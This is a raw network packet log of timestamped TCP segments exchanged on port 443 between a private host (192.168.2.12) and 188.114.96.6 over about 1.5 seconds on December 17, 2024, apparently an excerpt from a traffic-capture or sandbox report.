                                                                        Dec 17, 2024 08:38:42.291476965 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.291524887 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.295279026 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.295295000 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.295372963 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.295381069 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.295586109 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.299256086 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.299273014 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.299336910 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.299345016 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.299380064 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.299390078 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.304028988 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.304053068 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.304105997 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.304120064 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.304182053 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.304182053 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.307805061 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.307823896 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.307885885 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.307900906 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.307955027 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.307955027 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.312602043 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.312623978 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.312728882 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.312730074 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.312740088 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.312789917 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.316045046 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.316063881 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.316159010 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.316159010 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.316169024 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.316245079 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.320837975 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.320858002 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.321050882 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.321059942 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.321108103 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.483969927 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.483997107 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.484098911 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.484110117 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.484168053 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.484168053 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.484324932 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.484421015 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.489090919 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.489115000 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.489181995 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.489192963 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.489244938 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.492922068 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.492938995 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.493041039 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.493053913 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.493087053 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.497714996 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.497731924 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.497808933 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.497823954 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.497865915 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.501635075 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.501650095 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.501758099 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.501770973 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.501930952 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.506335020 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.506359100 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.506392956 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.506414890 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.506458998 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.506458998 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.509835958 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.509860992 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.510042906 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.510042906 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.510061026 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.510107994 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.514655113 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.514678955 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.514755964 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.514766932 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.514898062 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.676759005 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.676785946 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.676861048 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.676882029 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.677037954 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.681447029 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.681469917 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.681556940 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.681567907 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.681612015 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.685368061 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.685389042 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.685445070 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.685462952 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.685525894 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.685525894 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.689181089 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.689203978 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.689307928 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.689316034 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.689378977 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.693927050 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.693948030 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.694032907 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.694040060 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.694068909 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.694119930 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.697746992 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.697766066 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.697860003 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.697866917 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.697921991 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.702239990 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.702260971 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.702353954 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.702353954 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.702363968 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.702541113 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.706943989 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.706964970 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.707015038 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.707034111 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.707087994 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.707087994 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.869726896 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.869754076 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.869824886 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.869834900 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.869870901 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.870021105 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.874407053 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.874429941 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.874547958 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.874560118 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.874639988 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.878257990 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.878285885 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.878340960 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.878348112 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.878463984 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.878530979 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.883101940 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.883121967 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.883204937 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.883204937 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.883214951 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.883300066 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.886842966 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.886859894 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.887053967 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.887068987 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.887140989 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.891649008 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.891669035 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.891757011 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.891757011 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.891767025 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.891819000 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.895142078 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.895159006 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.895200014 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.895214081 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.895241976 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.895293951 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.899936914 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.899960041 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.900038004 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.900038004 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.900048018 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.900111914 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.062468052 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.062493086 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.062541962 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.062563896 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.062602043 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.062614918 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.067043066 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.067070007 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.067102909 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.067114115 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.067131042 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.067169905 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.070852041 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.070872068 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.070954084 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.070966005 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.071050882 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.075644970 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.075668097 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.075710058 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.075716972 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.075792074 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.075792074 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.079536915 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.079556942 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.079624891 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.079636097 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.079776049 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.083276033 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.083293915 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.083631039 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.083641052 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.084139109 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.087722063 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.087745905 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.087795973 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.087811947 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.087842941 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.087882042 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.092556000 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.092573881 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.092627048 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.092643023 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.092787027 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.254232883 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.254252911 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.254350901 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.254364014 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.254482031 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.258965015 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.258982897 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.259051085 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.259057045 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.259104013 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.262793064 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.262810946 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.262909889 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.262914896 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.262963057 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.267543077 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.267560005 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.267635107 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.267642021 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.267743111 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.271408081 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.271425962 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.271522045 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.271528006 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.271600008 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.276201010 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.276218891 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.276310921 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.276319981 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.276426077 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.280607939 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.280626059 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.280670881 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.280675888 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.280750990 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.284590960 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.284610987 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.284682035 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.284687042 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.284739017 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.446605921 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.446634054 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.446690083 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.446698904 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.446763039 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.451153994 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.451173067 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.451241970 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.451246977 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.451277971 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.455005884 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.455022097 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.455117941 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.455121994 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.455192089 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.459690094 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.459707022 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.459757090 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.459768057 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.459826946 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.463618040 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.463634014 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.463735104 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.463735104 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.463741064 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.463852882 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.468302965 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.468326092 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.468357086 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.468367100 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.468931913 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.472764015 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.472781897 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.472841978 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.472846985 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.472978115 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.476620913 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.476636887 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.476749897 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.476756096 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.476839066 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.638894081 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.638926029 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.639173985 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.639189005 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.639326096 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.643589973 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.643608093 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.643731117 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.643739939 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.643780947 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.647460938 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.647480011 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.647541046 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.647551060 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.647597075 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.647597075 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.652256966 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.652275085 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.652354956 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.652362108 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.652400017 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.656044006 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.656060934 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.656167984 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.656173944 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.656208038 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.660758018 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.660775900 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.660840988 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.660846949 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.660893917 CET49716443192.168.2.12188.114.96.6
